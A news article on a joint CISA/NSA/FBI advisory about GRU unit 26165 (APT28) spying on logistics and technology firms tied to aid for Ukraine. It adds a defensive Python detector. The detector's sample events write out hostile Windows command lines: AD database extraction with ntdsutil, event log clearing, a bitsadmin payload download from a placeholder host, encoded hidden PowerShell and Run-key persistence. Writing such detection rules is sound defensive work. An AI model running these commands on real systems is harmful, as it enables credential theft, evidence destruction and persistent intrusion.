The Cybersecurity and Infrastructure Security Agency (CISA), alongside the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and international partners, released a joint advisory today warning that Russian military intelligence hackers are targeting Western logistics companies and technology firms.
The campaign focuses explicitly on organizations involved in coordinating, transporting, and delivering aid to Ukraine.
According to the advisory released on May 21, 2025, the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, military unit 26165, known in cybersecurity circles as APT28, Fancy Bear, or Forest Blizzard, has conducted an ongoing cyber espionage campaign since 2022.
“This cyber espionage-oriented campaign targeting technology companies and logistics entities uses a mix of previously disclosed tactics, techniques, and procedures,” states the advisory. “The authoring agencies expect similar targeting and TTP use to continue.”
The hackers have targeted dozens of entities across 13 countries, including the United States, Ukraine, and several European nations. Affected sectors include the defense industry, transportation hubs like ports and airports, maritime operations, air traffic management, and IT services.

“Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise, and posture network defenses with a presumption of targeting,” CISA warned.
The advisory details how the hackers gained initial access through several methods, including password guessing and brute-force attacks, spearphishing, and exploitation of known vulnerabilities in Microsoft Outlook, the Roundcube webmail client, and WinRAR.
In a particularly concerning development, the GRU actors have also targeted IP cameras at strategic locations such as border crossings, military installations, and rail stations to track the movement of aid materials into Ukraine.
Over 80% of the targeted cameras were in Ukraine, with others in bordering countries like Romania, Poland, Hungary, and Slovakia.
After gaining access, the hackers seek information on aid shipments to Ukraine, including sender and recipient details, transportation numbers, departure and destination points, container registrations, travel routes, and cargo contents.
Windows Utilities Used for a Malicious Purpose
| Utility | Description of Malicious Use |
|---|---|
| ntdsutil | Extracted Active Directory database contents via `activate instance ntds` commands for credential harvesting. |
| wevtutil | Cleared Windows event logs to erase traces of malicious activity. |
| vssadmin | Created shadow copies of drives to access locked files during exfiltration. |
| schtasks | Established persistence through malicious scheduled tasks. |
| wmic | Queried system information and executed remote commands for lateral movement. |
| certutil | Decoded malicious payloads and verified forged certificates. |
| net | Enumerated network shares and user accounts for reconnaissance. |
| reg | Modified registry keys to maintain persistence and disable security controls. |
| powershell | Executed encoded scripts for payload delivery and credential dumping. |
| bitsadmin | Downloaded additional malware payloads while evading network monitoring. |
| icacls | Modified file permissions to enable unauthorized access to sensitive documents. |
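Every utility in the table is a legitimate, signed Windows binary, so a hunt cannot alert on the executable name alone; it has to key on the command-line pattern that turns routine administration into the abuse each row describes. As an added example (not code from the advisory or from this article), the following Python runs that logic over a batch of constructed process-creation events shaped like Sysmon Event ID 1 or Security 4688 records. The host names, paths, URL and command lines are constructed for the example; the regexes are the author's own encoding of each table row, and also cover the abbreviated `ac i ntds` spelling of the ntdsutil command.

```python
"""Hunt process-creation events for the LOLBin abuse patterns listed in the table above.

Added example: the events, hosts, paths and URL below are constructed, not advisory data.
"""
import re

# One rule per table row: executables it covers, a label for the abuse the row
# describes, and a command-line regex that separates that abuse from routine use
# of the same utility (e.g. "vssadmin list shadows" must not fire).
RULES = [
    ({"ntdsutil.exe"}, "AD database (ntds.dit) extraction",
     r"ac(?:tivate)?\s+i(?:nstance)?\s+ntds|\bifm\b"),
    ({"wevtutil.exe"}, "event log clearing", r"\b(?:cl|clear-log)\b"),
    ({"vssadmin.exe"}, "shadow copy creation", r"\bcreate\s+shadow\b"),
    ({"schtasks.exe"}, "scheduled task persistence", r"/create\b"),
    ({"wmic.exe"}, "remote process execution", r"/node:|process\s+call\s+create"),
    ({"certutil.exe"}, "payload decode/download", r"-(?:decode|decodehex|urlcache)\b"),
    # Anchored to the sub-command so a share name in "net use \\srv\share" does not match.
    ({"net.exe", "net1.exe"}, "share/account enumeration",
     r'^\s*\S*net1?(?:\.exe)?"?\s+(?:view|share|user|users|group|localgroup)\b'),
    ({"reg.exe"}, "registry persistence / defence tampering",
     r"\badd\b.*(?:\\Run\b|DisableAntiSpyware|DisableRealtimeMonitoring)"),
    ({"powershell.exe", "pwsh.exe"}, "encoded PowerShell command",
     r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ({"bitsadmin.exe"}, "BITS payload download", r"/(?:transfer|addfile)\b"),
    ({"icacls.exe"}, "permission change on sensitive path", r"/grant\b"),
]
COMPILED = [(names, label, re.compile(pat, re.IGNORECASE)) for names, label, pat in RULES]

# Constructed events, one per table row, in the field layout of Sysmon EID 1 / 4688.
SAMPLE_EVENTS = [
    {"Host": "dc01", "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\x" q q'},
    {"Host": "dc01", "Image": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil.exe cl Security"},
    {"Host": "fs02", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe create shadow /for=C:"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /create /tn Updater /tr C:\Users\Public\u.exe /sc minute /mo 30"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": 'wmic.exe /node:10.0.0.5 process call create "cmd /c whoami"'},
    {"Host": "ws17", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\p.b64 C:\Users\Public\p.exe"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net.exe view \\fileserver"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Up /t REG_SZ /d C:\Users\Public\u.exe"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job /download /priority high http://example.invalid/x C:\Users\Public\x.exe"},
    {"Host": "fs02", "Image": r"C:\Windows\System32\icacls.exe",
     "CommandLine": r"icacls.exe C:\Shipments /grant Everyone:F /T"},
]

# Constructed benign uses of the same binaries; none should produce a finding.
BENIGN_EVENTS = [
    {"Host": "fs02", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe list shadows"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Host": "dc01", "Image": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil.exe qe Security /c:5 /f:text"},
    {"Host": "ws17", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net.exe use Z: \\fileserver\share"},
]


def image_basename(image):
    """Lower-cased file name of the Image field, tolerant of forward slashes."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one finding per (event, rule) match, in event order."""
    findings = []
    for ev in events:
        name = image_basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        for names, label, rx in COMPILED:
            if name in names and rx.search(cmd):
                findings.append({"Host": ev.get("Host"), "Utility": name,
                                 "Technique": label, "CommandLine": cmd})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS + BENIGN_EVENTS):
        print(f"{f['Host']:6} {f['Utility']:16} {f['Technique']:42} {f['CommandLine']}")
```

Two caveats when running this against a real estate: Security 4688 only carries the command line if the "Include command line in process creation events" policy is enabled, so without it (or Sysmon) most of these rules have nothing to match; and the net, reg and icacls rows are inherently noisy, since administrators run the same commands, so those three need baselining and allowlisting before they are worth an alert, whereas ntdsutil against the live instance, `wevtutil cl` and `vssadmin create shadow` are rare enough on most hosts to page on directly.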
“These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments,” the advisory notes.
The joint advisory is signed by cybersecurity agencies from multiple countries, reflecting the international concern about these activities. In addition to U.S. agencies, contributors include organizations from the United Kingdom, Germany, the Czech Republic, Poland, Australia, Canada, Denmark, Estonia, France, and the Netherlands.
CISA recommends that organizations implement robust security measures, including network segmentation, multi-factor authentication with strong factors, regular security updates, and careful monitoring of access logs for suspicious activity.
This latest warning comes amid ongoing concerns about Russian cyber operations targeting critical infrastructure globally. Earlier this month, CISA and other agencies warned about Russian hackers targeting operational technology in water systems.